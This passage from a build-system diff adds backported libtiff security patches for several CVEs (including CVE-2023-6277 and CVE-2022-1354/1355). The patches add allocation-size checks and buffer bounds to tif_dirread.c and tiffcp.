++						". Memory not allocated, tag not read",
++						direntry->tdir_tag, direntry->tdir_tag, datasize,
++						filesize);
++		return (TIFFReadDirEntryErrAlloc);
++	}
++
+ 	if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+ 		return TIFFReadDirEntryErrIo;
+ 
+@@ -4534,6 +4550,20 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+         if( !_TIFFFillStrilesInternal( tif, 0 ) )
+             return -1;
+ 
++	/* Before allocating a huge amount of memory for corrupted files, check if
++	 * size of requested memory is not greater than file size. */
++	uint64 filesize = TIFFGetFileSize(tif);
++	uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++	if (allocsize > filesize)
++	{
++		TIFFWarningExt(tif->tif_clientdata, module,
++						"Requested memory size for StripByteCounts of %" PRIu64
++						" is greather than filesize %" PRIu64
++						". Memory not allocated",
++						allocsize, filesize);
++		return -1;
++	}
++
+ 	if (td->td_stripbytecount_p)
+ 		_TIFFfree(td->td_stripbytecount_p);
+ 	td->td_stripbytecount_p = (uint64*)
+@@ -4544,9 +4574,7 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ 
+ 	if (td->td_compression != COMPRESSION_NONE) {
+ 		uint64 space;
+-		uint64 filesize;
+ 		uint16 n;
+-		filesize = TIFFGetFileSize(tif);
+ 		if (!(tif->tif_flags&TIFF_BIGTIFF))
+ 			space=sizeof(TIFFHeaderClassic)+2+dircount*12+4;
+ 		else
+@@ -4854,6 +4882,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ 			dircount16 = (uint16)dircount64;
+ 			dirsize = 20;
+ 		}
++		/* Before allocating a huge amount of memory for corrupted files, check
++		 * if size of requested memory is not greater than file size. */
++		uint64 filesize = TIFFGetFileSize(tif);
++		uint64 allocsize = (uint64)dircount16 * dirsize;
++		if (allocsize > filesize)
++		{
++			TIFFWarningExt(
++				tif->tif_clientdata, module,
++				"Requested memory size for TIFF directory of %" PRIu64
++				" is greather than filesize %" PRIu64
++				". Memory not allocated, TIFF directory not read",
++				allocsize, filesize);
++			return 0;
++		}
+ 		origdir = _TIFFCheckMalloc(tif, dircount16,
+ 		    dirsize, "to read TIFF directory");
+ 		if (origdir == NULL)
+@@ -4957,6 +4999,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ 			             "Sanity check on directory count failed, zero tag directories not supported");
+ 			return 0;
+ 		}
++		/* Before allocating a huge amount of memory for corrupted files, check
++		 * if size of requested memory is not greater than file size. */
++		uint64 filesize = TIFFGetFileSize(tif);
++		uint64 allocsize = (uint64)dircount16 * dirsize;
++		if (allocsize > filesize)
++		{
++			TIFFWarningExt(
++				tif->tif_clientdata, module,
++				"Requested memory size for TIFF directory of %" PRIu64
++				" is greather than filesize %" PRIu64
++				". Memory not allocated, TIFF directory not read",
++				allocsize, filesize);
++			return 0;
++		}
+ 		origdir = _TIFFCheckMalloc(tif, dircount16,
+ 						dirsize,
+ 						"to read TIFF directory");
+@@ -5000,6 +5056,8 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ 			}
+ 		}
+ 	}
++	/* No check against filesize needed here because "dir" should have same size
++	 * than "origdir" checked above. */
+ 	dir = (TIFFDirEntry*)_TIFFCheckMalloc(tif, dircount16,
+ 						sizeof(TIFFDirEntry),
+ 						"to read TIFF directory");
+@@ -5769,7 +5827,20 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ 			_TIFFfree(data);
+ 			return(0);
+ 		}
+-
++		/* Before allocating a huge amount of memory for corrupted files, check
++		 * if size of requested memory is not greater than file size. */
++		uint64 filesize = TIFFGetFileSize(tif);
++		uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++		if (allocsize > filesize)
++		{
++			TIFFWarningExt(tif->tif_clientdata, module,
++							"Requested memory size for StripArray of %" PRIu64
++							" is greather than filesize %" PRIu64
++							". Memory not allocated",
++							allocsize, filesize);
++			_TIFFfree(data);
++			return (0);
++		}
+ 		resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ 		if (resizeddata==0) {
+ 			_TIFFfree(data);
+@@ -5865,6 +5936,23 @@ static void allocChoppedUpStripArrays(TI
+     }
+     bytecount = last_offset + last_bytecount - offset;
+ 
++	/* Before allocating a huge amount of memory for corrupted files, check if
++	 * size of StripByteCount and StripOffset tags is not greater than
++	 * file size.
++	 */
++	uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++	uint64 filesize = TIFFGetFileSize(tif);
++	if (allocsize > filesize)
++	{
++		TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++						"Requested memory size for StripByteCount and "
++						"StripOffsets %" PRIu64
++						" is greather than filesize %" PRIu64
++						". Memory not allocated",
++						allocsize, filesize);
++		return;
++	}
++
+     newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
+                             "for chopped \"StripByteCounts\" array");
+     newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
new file mode 100644
index 0000000000..644b3fdb3f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
@@ -0,0 +1,152 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 0b025324711213a75e38b52f7e7ba60235f108aa Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 19:47:22 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Ammends 5320c9d89c054fa805d037d84c57da874470b01a
+
+This fixes a performance regression caught by the GDAL regression test
+suite.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-2.patch?h=ubuntu/focal-security
+Upstream commit  https://gitlab.com/libtiff/libtiff/-/commit/0b025324711213a75e38b52f7e7ba60235f108aa]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 83 +++++++++++++++++++++++++------------------
+ 1 file changed, 48 insertions(+), 35 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -864,19 +864,22 @@ static enum TIFFReadDirEntryErr TIFFRead
+ 	datasize=(*count)*typesize;
+ 	assert((tmsize_t)datasize>0);
+ 
+-	/* Before allocating a huge amount of memory for corrupted files, check if
+-	 * size of requested memory is not greater than file size.
+-	 */
+-	uint64 filesize = TIFFGetFileSize(tif);
+-	if (datasize > filesize)
++	if (datasize > 100 * 1024 * 1024)
+ 	{
+-		TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
+-						"Requested memory size for tag %d (0x%x) %" PRIu32
+-						" is greather than filesize %" PRIu64
+-						". Memory not allocated, tag not read",
+-						direntry->tdir_tag, direntry->tdir_tag, datasize,
+-						filesize);
+-		return (TIFFReadDirEntryErrAlloc);
++		/* Before allocating a huge amount of memory for corrupted files, check
++		 * if size of requested memory is not greater than file size.
++		 */
++		const uint64 filesize = TIFFGetFileSize(tif);
++		if (datasize > filesize)
++		{
++			TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++							"Requested memory size for tag %d (0x%x) %" PRIu32
++							" is greater than filesize %" PRIu64
++							". Memory not allocated, tag not read",
++							direntry->tdir_tag, direntry->tdir_tag, datasize,
++							filesize);
++			return (TIFFReadDirEntryErrAlloc);
++		}
+ 	}
+ 
+ 	if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+@@ -4550,18 +4553,22 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+         if( !_TIFFFillStrilesInternal( tif, 0 ) )
+             return -1;
+ 
+-	/* Before allocating a huge amount of memory for corrupted files, check if
+-	 * size of requested memory is not greater than file size. */
+-	uint64 filesize = TIFFGetFileSize(tif);
+-	uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
+-	if (allocsize > filesize)
++	const uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++	uint64 filesize = 0;
++	if (allocsize > 100 * 1024 * 1024)
+ 	{
+-		TIFFWarningExt(tif->tif_clientdata, module,
+-						"Requested memory size for StripByteCounts of %" PRIu64
+-						" is greather than filesize %" PRIu64
+-						". Memory not allocated",
+-						allocsize, filesize);
+-		return -1;
++		/* Before allocating a huge amount of memory for corrupted files, check
++		 * if size of requested memory is not greater than file size. */
++		filesize = TIFFGetFileSize(tif);
++		if (allocsize > filesize)
++		{
++			TIFFWarningExt(
++				tif->tif_clientdata, module,
++				"Requested memory size for StripByteCounts of %" PRIu64
++				" is greater than filesize %" PRIu64 ". Memory not allocated",
++				allocsize, filesize);
++			return -1;
++		}
+ 	}
+ 
+ 	if (td->td_stripbytecount_p)
+@@ -4608,11 +4615,13 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+                             return -1;
+ 			space+=datasize;
+ 		}
++		if (filesize == 0)
++			filesize = TIFFGetFileSize(tif);
+ 		if( filesize < space )
+-                    /* we should perhaps return in error ? */
+-                    space = filesize;
+-                else
+-                    space = filesize - space;
++			/* we should perhaps return in error ? */
++			space = filesize;
++		else
++			space = filesize - space;
+ 		if (td->td_planarconfig == PLANARCONFIG_SEPARATE)
+ 			space /= td->td_samplesperpixel;
+ 		for (strip = 0; strip < td->td_nstrips; strip++)
+@@ -4882,19 +4891,23 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ 			dircount16 = (uint16)dircount64;
+ 			dirsize = 20;
+ 		}
+-		/* Before allocating a huge amount of memory for corrupted files, check
+-		 * if size of requested memory is not greater than file size. */
+-		uint64 filesize = TIFFGetFileSize(tif);
+-		uint64 allocsize = (uint64)dircount16 * dirsize;
+-		if (allocsize > filesize)
++		const uint64 allocsize = (uint64)dircount16 * dirsize;
++		if (allocsize > 100 * 1024 * 1024)
+ 		{
+-			TIFFWarningExt(
+-				tif->tif_clientdata, module,
+-				"Requested memory size for TIFF directory of %" PRIu64
+-				" is greather than filesize %" PRIu64
+-				". Memory not allocated, TIFF directory not read",
+-				allocsize, filesize);
+-			return 0;
++			/* Before allocating a huge amount of memory for corrupted files,
++			 * check if size of requested memory is not greater than file size.
++			 */
++			const uint64 filesize = TIFFGetFileSize(tif);
++			if (allocsize > filesize)
++			{
++				TIFFWarningExt(
++					tif->tif_clientdata, module,
++					"Requested memory size for TIFF directory of %" PRIu64
++					" is greater than filesize %" PRIu64
++					". Memory not allocated, TIFF directory not read",
++					allocsize, filesize);
++				return 0;
++			}
+ 		}
+ 		origdir = _TIFFCheckMalloc(tif, dircount16,
+ 		    dirsize, "to read TIFF directory");
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
new file mode 100644
index 0000000000..ed7d7e7b96
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
@@ -0,0 +1,46 @@
+Backport of:
+
+From de7bfd7d4377c266f81849579f696fa1ad5ba6c3 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 20:13:45 +0100
+Subject: [PATCH] TIFFFetchDirectory(): remove useless allocsize vs filesize
+ check
+
+CoverityScan rightly points that the max value for dircount16 * dirsize
+is 4096 * 20. That's small enough not to do any check
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-3.patch?h=ubuntu/focal-security
+Upstream commit  https://gitlab.com/libtiff/libtiff/-/commit/de7bfd7d4377c266f81849579f696fa1ad5ba6c3]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 18 ------------------
+ 1 file changed, 18 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -4891,24 +4891,6 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ 			dircount16 = (uint16)dircount64;
+ 			dirsize = 20;
+ 		}
+-		const uint64 allocsize = (uint64)dircount16 * dirsize;
+-		if (allocsize > 100 * 1024 * 1024)
+-		{
+-			/* Before allocating a huge amount of memory for corrupted files,
+-			 * check if size of requested memory is not greater than file size.
+-			 */
+-			const uint64 filesize = TIFFGetFileSize(tif);
+-			if (allocsize > filesize)
+-			{
+-				TIFFWarningExt(
+-					tif->tif_clientdata, module,
+-					"Requested memory size for TIFF directory of %" PRIu64
+-					" is greater than filesize %" PRIu64
+-					". Memory not allocated, TIFF directory not read",
+-					allocsize, filesize);
+-				return 0;
+-			}
+-		}
+ 		origdir = _TIFFCheckMalloc(tif, dircount16,
+ 		    dirsize, "to read TIFF directory");
+ 		if (origdir == NULL)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
new file mode 100644
index 0000000000..1a43fd3230
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
@@ -0,0 +1,94 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From dbb825a8312f30e63a06c272010967d51af5c35a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 21:30:58 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-4.patch?h=ubuntu/focal-security
+Upstream commit  https://gitlab.com/libtiff/libtiff/-/commit/dbb825a8312f30e63a06c272010967d51af5c35a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 54 +++++++++++++++++++++++++------------------
+ 1 file changed, 31 insertions(+), 23 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -5822,19 +5822,24 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ 			_TIFFfree(data);
+ 			return(0);
+ 		}
+-		/* Before allocating a huge amount of memory for corrupted files, check
+-		 * if size of requested memory is not greater than file size. */
+-		uint64 filesize = TIFFGetFileSize(tif);
+-		uint64 allocsize = (uint64)nstrips * sizeof(uint64);
+-		if (allocsize > filesize)
++		const uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++		if (allocsize > 100 * 1024 * 1024)
+ 		{
+-			TIFFWarningExt(tif->tif_clientdata, module,
+-							"Requested memory size for StripArray of %" PRIu64
+-							" is greather than filesize %" PRIu64
+-							". Memory not allocated",
+-							allocsize, filesize);
+-			_TIFFfree(data);
+-			return (0);
++			/* Before allocating a huge amount of memory for corrupted files,
++				* check if size of requested memory is not greater than file size.
++				*/
++			const uint64 filesize = TIFFGetFileSize(tif);
++			if (allocsize > filesize)
++			{
++				TIFFWarningExt(
++					tif->tif_clientdata, module,
++					"Requested memory size for StripArray of %" PRIu64
++					" is greater than filesize %" PRIu64
++					". Memory not allocated",
++					allocsize, filesize);
++				_TIFFfree(data);
++				return (0);
++			}
+ 		}
+ 		resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ 		if (resizeddata==0) {
+@@ -5935,17 +5940,20 @@ static void allocChoppedUpStripArrays(TI
+ 	 * size of StripByteCount and StripOffset tags is not greater than
+ 	 * file size.
+ 	 */
+-	uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
+-	uint64 filesize = TIFFGetFileSize(tif);
+-	if (allocsize > filesize)
+-	{
+-		TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
+-						"Requested memory size for StripByteCount and "
+-						"StripOffsets %" PRIu64
+-						" is greather than filesize %" PRIu64
+-						". Memory not allocated",
+-						allocsize, filesize);
+-		return;
++    const uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++    if (allocsize > 100 * 1024 * 1024)
++    {
++        const uint64 filesize = TIFFGetFileSize(tif);
++        if (allocsize > filesize)
++        {
++            TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++                            "Requested memory size for StripByteCount and "
++                            "StripOffsets %" PRIu64
++                            " is greater than filesize %" PRIu64
++                            ". Memory not allocated",
++                            allocsize, filesize);
++            return;
++        }
+ 	}
+ 
+     newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
new file mode 100644
index 0000000000..01ed5dcd24
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
@@ -0,0 +1,28 @@
+From 561599c99f987dc32ae110370cfdd7df7975586b Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 5 Feb 2022 20:36:41 +0100
+Subject: [PATCH] TIFFReadDirectory(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0562
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 2bbc4585..23194ced 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -4126,7 +4126,8 @@
+                     goto bad;
+                 }
+ 
+-                memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
++                if (old_extrasamples > 0)
++                    memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
+                 _TIFFsetShortArray(&tif->tif_dir.td_sampleinfo, new_sampleinfo, tif->tif_dir.td_extrasamples);
+                 _TIFFfree(new_sampleinfo);
+         }
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
new file mode 100644
index 0000000000..71b85cac10
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
@@ -0,0 +1,212 @@
+From 87881e093691a35c60b91cafed058ba2dd5d9807 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 5 Dec 2021 14:37:46 +0100
+Subject: [PATCH] TIFFReadDirectory: fix OJPEG hack (fixes #319)
+
+to avoid having the size of the strip arrays inconsistent with the
+number of strips returned by TIFFNumberOfStrips(), which may cause
+out-ouf-bounds array read afterwards.
+
+One of the OJPEG hack that alters SamplesPerPixel may influence the
+number of strips. Hence compute tif_dir.td_nstrips only afterwards.
+
+CVE: CVE-2022-1354
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/87f580f39011109b3bb5f6eca13fac543a542798]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ libtiff/tif_dirread.c | 162 ++++++++++++++++++++++--------------------
+ 1 file changed, 83 insertions(+), 79 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 8f434ef5..14c031d1 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -3794,50 +3794,7 @@ TIFFReadDirectory(TIFF* tif)
+ 		MissingRequired(tif,"ImageLength");
+ 		goto bad;
+ 	}
+-	/*
+-	 * Setup appropriate structures (by strip or by tile)
+-	 */
+-	if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
+-		tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);  
+-		tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
+-		tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
+-		tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
+-		tif->tif_flags &= ~TIFF_ISTILED;
+-	} else {
+-		tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
+-		tif->tif_flags |= TIFF_ISTILED;
+-	}
+-	if (!tif->tif_dir.td_nstrips) {
+-		TIFFErrorExt(tif->tif_clientdata, module,
+-		    "Cannot handle zero number of %s",
+-		    isTiled(tif) ? "tiles" : "strips");
+-		goto bad;
+-	}
+-	tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
+-	if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
+-		tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
+-	if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
+-#ifdef OJPEG_SUPPORT
+-		if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
+-		    (isTiled(tif)==0) &&
+-		    (tif->tif_dir.td_nstrips==1)) {
+-			/*
+-			 * XXX: OJPEG hack.
+-			 * If a) compression is OJPEG, b) it's not a tiled TIFF,
+-			 * and c) the number of strips is 1,
+-			 * then we tolerate the absence of stripoffsets tag,
+-			 * because, presumably, all required data is in the
+-			 * JpegInterchangeFormat stream.
+-			 */
+-			TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
+-		} else
+-#endif
+-        {
+-			MissingRequired(tif,
+-				isTiled(tif) ? "TileOffsets" : "StripOffsets");
+-			goto bad;
+-		}
+-	}
++
+ 	/*
+ 	 * Second pass: extract other information.
+ 	 */
+@@ -4042,41 +3999,6 @@ TIFFReadDirectory(TIFF* tif)
+ 			} /* -- if (!dp->tdir_ignore) */
+ 		} /* -- for-loop -- */
+ 
+-        if( tif->tif_mode == O_RDWR &&
+-            tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
+-            tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
+-            tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
+-            tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
+-            tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
+-            tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
+-            tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
+-            tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
+-        {
+-            /* Directory typically created with TIFFDeferStrileArrayWriting() */
+-            TIFFSetupStrips(tif);
+-        }
+-        else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
+-        {
+-            if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
+-            {
+-                if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
+-                                         tif->tif_dir.td_nstrips,
+-                                         &tif->tif_dir.td_stripoffset_p))
+-                {
+-                    goto bad;
+-                }
+-            }
+-            if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
+-            {
+-                if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
+-                                         tif->tif_dir.td_nstrips,
+-                                         &tif->tif_dir.td_stripbytecount_p))
+-                {
+-                    goto bad;
+-                }
+-            }
+-        }
+-
+ 	/*
+ 	 * OJPEG hack:
+ 	 * - If a) compression is OJPEG, and b) photometric tag is missing,
+@@ -4147,6 +4069,88 @@ TIFFReadDirectory(TIFF* tif)
+ 		}
+ 	}
+ 
++	/*
++	 * Setup appropriate structures (by strip or by tile)
++	 * We do that only after the above OJPEG hack which alters SamplesPerPixel
++	 * and thus influences the number of strips in the separate planarconfig.
++	 */
++	if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
++		tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);  
++		tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
++		tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
++		tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
++		tif->tif_flags &= ~TIFF_ISTILED;
++	} else {
++		tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
++		tif->tif_flags |= TIFF_ISTILED;
++	}
++	if (!tif->tif_dir.td_nstrips) {
++		TIFFErrorExt(tif->tif_clientdata, module,
++		    "Cannot handle zero number of %s",
++		    isTiled(tif) ? "tiles" : "strips");
++		goto bad;
++	}
++	tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
++	if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
++		tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
++	if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
++#ifdef OJPEG_SUPPORT
++		if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
++		    (isTiled(tif)==0) &&
++		    (tif->tif_dir.td_nstrips==1)) {
++			/*
++			 * XXX: OJPEG hack.
++			 * If a) compression is OJPEG, b) it's not a tiled TIFF,
++			 * and c) the number of strips is 1,
++			 * then we tolerate the absence of stripoffsets tag,
++			 * because, presumably, all required data is in the
++			 * JpegInterchangeFormat stream.
++			 */
++			TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
++		} else
++#endif
++        {
++			MissingRequired(tif,
++				isTiled(tif) ? "TileOffsets" : "StripOffsets");
++			goto bad;
++		}
++	}
++
++        if( tif->tif_mode == O_RDWR &&
++            tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
++            tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
++            tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
++            tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
++            tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
++            tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
++            tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
++            tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
++        {
++            /* Directory typically created with TIFFDeferStrileArrayWriting() */
++            TIFFSetupStrips(tif);
++        }
++        else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
++        {
++            if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
++            {
++                if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
++                                         tif->tif_dir.td_nstrips,
++                                         &tif->tif_dir.td_stripoffset_p))
++                {
++                    goto bad;
++                }
++            }
++            if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
++            {
++                if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
++                                         tif->tif_dir.td_nstrips,
++                                         &tif->tif_dir.td_stripbytecount_p))
++                {
++                    goto bad;
++                }
++            }
++        }
++
+ 	/*
+ 	 * Make sure all non-color channels are extrasamples.
+ 	 * If it's not the case, define them as such.
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
new file mode 100644
index 0000000000..e59f5aad55
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
@@ -0,0 +1,62 @@
+From fb1db384959698edd6caeea84e28253d272a0f96 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 2 Apr 2022 22:33:31 +0200
+Subject: [PATCH] tiffcp: avoid buffer overflow in "mode" string (fixes #400)
+
+CVE: CVE-2022-1355
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/c1ae29f9ebacd29b7c3e0c7db671af7db3584bc2]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ tools/tiffcp.c | 25 ++++++++++++++++++++-----
+ 1 file changed, 20 insertions(+), 5 deletions(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index fd129bb7..8d944ff6 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -274,19 +274,34 @@ main(int argc, char* argv[])
+ 			deftilewidth = atoi(optarg);
+ 			break;
+ 		case 'B':
+-			*mp++ = 'b'; *mp = '\0';
++			if (strlen(mode) < (sizeof(mode) - 1))
++			{
++				*mp++ = 'b'; *mp = '\0';
++			}
+ 			break;
+ 		case 'L':
+-			*mp++ = 'l'; *mp = '\0';
++			if (strlen(mode) < (sizeof(mode) - 1))
++			{
++				*mp++ = 'l'; *mp = '\0';
++			}
+ 			break;
+ 		case 'M':
+-			*mp++ = 'm'; *mp = '\0';
++			if (strlen(mode) < (sizeof(mode) - 1))
++			{
++				*mp++ = 'm'; *mp = '\0';
++			}
+ 			break;
+ 		case 'C':
